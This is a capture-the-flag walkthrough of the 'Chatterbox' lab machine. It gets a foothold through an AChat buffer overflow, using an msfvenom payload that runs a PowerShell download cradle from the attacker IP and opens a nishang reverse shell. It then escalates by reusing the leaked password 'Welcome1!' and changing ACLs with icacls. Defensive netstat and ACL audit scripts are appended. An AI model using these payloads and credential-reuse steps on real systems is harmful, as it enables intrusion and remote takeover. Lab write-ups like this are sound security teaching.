Chatterbox

Information Gathering

Nmap Recon Results

We begin by identifying the operating system of the target machine from the TTL of its responses (TTL recon), which points to a Windows system.

Nmap Recon Open Ports

Now we will identify the open ports on the server to get a clearer idea of which services run on it.

nmap -sS --min-rate 5000 -p- --open -n 10.129.40.4 -Pn -vvvv

Scan Open Ports

As we can see, only 2 ports are open; we will investigate what they are.

Service and version detection

nmap -sC -sV -p 9255-9256 10.129.40.4  -n -oN targeted

Service Detection

Okay, now I had a little something to go on. I hit the discovered services with a version scan to obtain more information:

A little bit of research told me that https://sourceforge.net/projects/achat/ is a freeware solution for conducting instant messaging and file sharing across a LAN. A little bit more research told me that some versions of it are vulnerable to a remote buffer overflow attack.

Vulnerability Identification

searchsploit achat

Identifying AChat Exploit

Exploit Db Link

https://www.exploit-db.com/exploits/36025

We will modify the exploit code in the following lines, changing the IP address and port to those of the server.

Change ip and Ports

To gain access to the system, we create a payload with msfvenom using the following instruction. It executes a PowerShell command that makes a GET request and runs the fetched code in memory.

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35:80/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f py

Instruction Payload

Exploit Invoke-Powershell-Tcp.ps1

Now we serve the file "Invoke-PowerShellTcp.ps1" from the nishang repository so that the server finds the resource specified in our payload and we obtain the reverse connection. Before that, we first modify our shell.ps1 script so that, after the code has been loaded into memory on the server side, it executes the following instruction:

Instruction To execute

Buffer OverFlow Exploit

As we can see, from the server side a GET request is sent to our Python HTTP server and we obtain a reverse connection.

Privilege Escalation

Method I

System Enumeration

Enumerating the system, we note that we do not have privilege tokens that we could abuse.

Token Privileges

Active Connections

We list all active connections on the server to obtain more information. If we run out of options to gain privileges, we will investigate more about what we can find.

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       360
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       792
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       452
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       476
  TCP    10.129.40.4:139        0.0.0.0:0              LISTENING       4
  TCP    10.129.40.4:9255       0.0.0.0:0              LISTENING       5380
  TCP    10.129.40.4:9256       0.0.0.0:0              LISTENING       5380
  TCP    10.129.40.4:49158      10.10.14.35:443        ESTABLISHED     460
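As an added detection-side example (not from the original writeup), the PowerShell function below parses netstat -ano text and reports ESTABLISHED sockets that the host itself initiated towards a non-local peer, which is exactly how the reverse shell on PID 460 shows up in the table above. The sample rows are copied from that table; the $KnownGoodRemote allow-list is an assumption.

```powershell
# Added example: spot client-side ESTABLISHED connections to a non-local peer
# in "netstat -ano" output, the pattern the reverse shell on PID 460 leaves.
function Find-OutboundConnection {
    param(
        [Parameter(Mandatory)][string[]]$NetstatLines,
        [string[]]$KnownGoodRemote = @()    # assumption: peers the host is expected to reach
    )
    $rows = foreach ($line in $NetstatLines) {
        $f = $line.Trim() -split '\s+'
        if ($f.Count -lt 5 -or $f[0] -ne 'TCP') { continue }   # skip header, UDP, blank lines
        [pscustomobject]@{ Local = $f[1]; Remote = $f[2]; State = $f[3]; ProcessId = [int]$f[4] }
    }
    # Ports this host serves: an ESTABLISHED row whose local port is one of
    # these is an inbound client, not a connection the host opened itself.
    $served = @($rows | Where-Object { $_.State -eq 'LISTENING' } |
                ForEach-Object { ($_.Local -split ':')[-1] } | Sort-Object -Unique)
    foreach ($r in $rows) {
        if ($r.State -ne 'ESTABLISHED') { continue }
        if ($r.Remote -match '^(127\.\d+\.\d+\.\d+|\[::1\]):') { continue }   # loopback
        $remoteHost = $r.Remote -replace ':\d+$', ''       # strip the port, IPv4 or [IPv6]
        if ($KnownGoodRemote -contains $remoteHost) { continue }
        if ($served -contains ($r.Local -split ':')[-1]) { continue }
        $r
    }
}

# Constructed sample: rows from the table above plus the netstat header line
$sample = @'
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.129.40.4:9255       0.0.0.0:0              LISTENING       5380
  TCP    10.129.40.4:49158      10.10.14.35:443        ESTABLISHED     460
'@ -split "`r?`n"

Find-OutboundConnection -NetstatLines $sample |
    ForEach-Object { "PID $($_.ProcessId): $($_.Local) -> $($_.Remote)" }

# On a live host: Find-OutboundConnection -NetstatLines (netstat -ano)
```

Resolve the reported ProcessId with Get-Process -Id or tasklist to see which binary owns the socket; a powershell.exe talking to a peer on 443 that is not a web server is worth a closer look.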

To enumerate the system we use the PowerUp script, which identifies possible ways to gain privileges.

Alfred Credentials

Credentials:

Alfred : Welcome1!

Now we have valid credentials, so we can try to reuse them with other users.

# Prove that we can start processes from this shell
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35/shell.ps1')"

# Store the recovered password as a SecureString
$Secpass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force

# Build a credential object for the user we want to try the password against
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $Secpass)


ReUse Credentials

Token Privileges as the Administrator user

With the Administrator's token privileges we could also use common exploits such as Juicy Potato.

Method II

Checking Acl Administrator

Get-Acl | FL *

Administrator ACL

We can see that we have full permissions on the "C:\Users\Administrator\Desktop" directory, which means we can take advantage of that to grant ourselves permission to modify, execute or read files in that directory.

icacls root.txt /T /grant alfred:F

Acl root.txt

Now we have full control of the file "root.txt", so we can read, modify or execute it as we want.
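As an added defender-side check (not part of the original writeup), the following PowerShell audits every profile folder under C:\Users for ACEs that give a non-owner, non-administrative account Modify or FullControl, which is the misconfiguration on Administrator's Desktop that Method II relies on. It assumes PowerShell 3 or later; the profile root is a parameter and the trusted principal list is an assumption.

```powershell
# Added example: report ACL entries on user profile folders that let a
# different, non-administrative account write to them (the weakness used above).
# Assumes PowerShell 3+ (for -Directory); $ProfileRoot defaults to C:\Users.
function Find-ProfileAclWeakness {
    param([string]$ProfileRoot = 'C:\Users')

    # Principals that legitimately hold full control inside every profile (assumption)
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')
    $modify       = [int][System.Security.AccessControl.FileSystemRights]::Modify
    $genericAll   = 0x10000000   # GENERIC_ALL, appears as a raw number in some inherited ACEs
    $genericWrite = 0x40000000   # GENERIC_WRITE

    foreach ($prof in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $owner = $prof.Name
        if ($owner -eq 'Public') { continue }   # shared by design, would only add noise
        $dirs = @($prof) + @(Get-ChildItem -Path $prof.FullName -Directory -Recurse -ErrorAction SilentlyContinue)
        foreach ($dir in $dirs) {
            $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                $who    = $ace.IdentityReference.Value
                $rights = [int]$ace.FileSystemRights
                $canWrite = (($rights -band $modify) -eq $modify) -or
                            (($rights -band ($genericAll -bor $genericWrite)) -ne 0)
                if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and
                    $trusted -notcontains $who -and
                    ($who -split '\\')[-1] -ne $owner) {
                    [pscustomobject]@{
                        Path      = $dir.FullName
                        Identity  = $who
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
    }
}

# Anything listed here lets one local user write into another user's profile
Find-ProfileAclWeakness | Format-Table -AutoSize
```

An ACE such as CHATTERBOX\Alfred with FullControl on C:\Users\Administrator\Desktop would be reported by this audit; the fix is to remove that explicit grant with icacls /remove or to reset the folder to inherited permissions.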